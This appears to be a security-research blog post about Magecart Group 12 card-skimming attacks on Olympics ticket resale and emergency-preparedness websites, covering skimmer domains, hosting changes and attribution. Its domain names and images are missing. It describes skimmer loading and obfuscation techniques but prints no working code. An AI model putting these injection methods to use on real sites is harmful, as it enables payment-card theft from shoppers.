Labs Magecart

Magecart Group 12’s Latest: Actors Behind Cyberattacks on Olympics Ticket Re-sellers Deftly Swapped Domains to Continue Campaign

A recent blog post by Jacob Pimental and Max Kersten highlighted Magecart activity targeting ticket re-selling websites for the 2020 Olympics and EUFA Euro 2020, and respectively. These sites were compromised by a skimmer using the domain for data exfiltration. With RiskIQ data, our researchers built on the previous reporting to identify more skimming domains used by the attackers, as well as additional compromised sites. RiskIQ can also now attribute all these cyberattacks to Magecart Group 12.

The obfuscation and skimming code we observed on matches that used by Magecart Group 12, whose skimmer and obfuscation techniques we analyzed in our blog posts, "New Year, Same Magecart: The Continuation of Web-based Supply Chain Attacks" and "Magento Attack: All Payment Platforms are Targets for Magecart Attacks." However, there are differences in the techniques employed by Group 12 in these more recent compromises, which we'll break down here.

In those blog posts, we noted that Group 12 employed base64 encoded checks against the URL looking for the word "checkout" to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL. Quoting from our May 1st, 2019 report:

"Most of Group 12's injections occur with a pre-filter on the page—a small snippet of JavaScript that checks to see if they want to inject their skimmer on the page. Here's what it looks like:"

Magecart Group 12's script tag from RiskIQ's May report

However, in these more recent cyberattacks, the skimming JavaScript is loaded without obfuscation or URL checks. Instead, the script loads via a variable the attackers named 'eventsListenerPool,' which is an alias for document.createElement('script'):

The Magecart skimmer

The variable loading the skimmer

Next Domain Up

On February 3rd, Pimental and Kersten published their followup blog detailing their efforts to identify further victims and have the skimming domain taken down by the Chinese company through which it was registered. On February 2nd, RiskIQ observed that was replaced on at least two of the victim sites named in the blog by a live skimmer domain,

The new skimmer domain

New skimmer domain

RiskIQ has observed the domain on three victim sites so far, all of which were previously compromised by, as seen through our host pairs data set in RiskIQ Community:

Victims of original skimmer domain

Victims of new skimmer domain

The domain was registered on February 1st, 2020, through Chinese registrar Guangzhou Shidaihulian ( and uses the same DNS provider as, DNSPod (also based in China). Both domains are hosted on NGINX servers and use Let's Encrypt certs. The IPs connected to have changed at least once a day and sometimes more often, with each server, so far, based in Russia.

Resolutions for

Hosting for followed a more leisurely pace of flux. From January 2019 through January 2020, it sometimes used the same IP for weeks at a time and utilized servers based all over the world.

Resolutions for

Targets Beyond Sporting Event Ticket Re-selling

RiskIQ's detection logic allowed us to identify additional domains hosting this particular magecart skimmer. Two popular emergency preparedness sites, and, were affected by one of these additional skimmer domains.

One of the new victims with an Alexa ranking of 105,288

Both sites are owned by Blue Chip Group Manufacturing and appear to be similarly constructed. We observed loading skimming code from on January 27th. The site seems to have been loading the skimming code from January 16th through 29th. In these instances, the skimmer was added through a simple script tag.

Host pairs showing sites loading

Magecart script on

Magecart script on

It appears the injections have been removed from sites, and they are currently free of skimming code. Additional IOCs can be viewed in our Magecart Group 12 project here:

Safety in the Age of Magecart

The activity seen here demonstrates that magecart is a persistent and resilient threat. Given the lucrative nature of card skimming, Magecart attacks will continue to evolve and surprise security researchers with new capabilities. They're learning from past cyberattacks to stay one step ahead, so it's on us to do the same. Make sure you're staying up to date by reading all our findings on Magecart and stay tuned as we continue to shine a light on new developments. Also, find out how RiskIQ protects customers by reading up on our JavaScript Threats Module here.


Following the publication of this article, we noticed further detections showing that was also loading skimming code from, another Group 12 domain. Our data shows that this began on January 24th. We have communicated this to the affected company and are working with them to remediate.

Subscribe to Our Newsletter

Subscribe to the RiskIQ newsletter to stay up-to-date on our latest content, headlines, research, events, and more.

Base Editor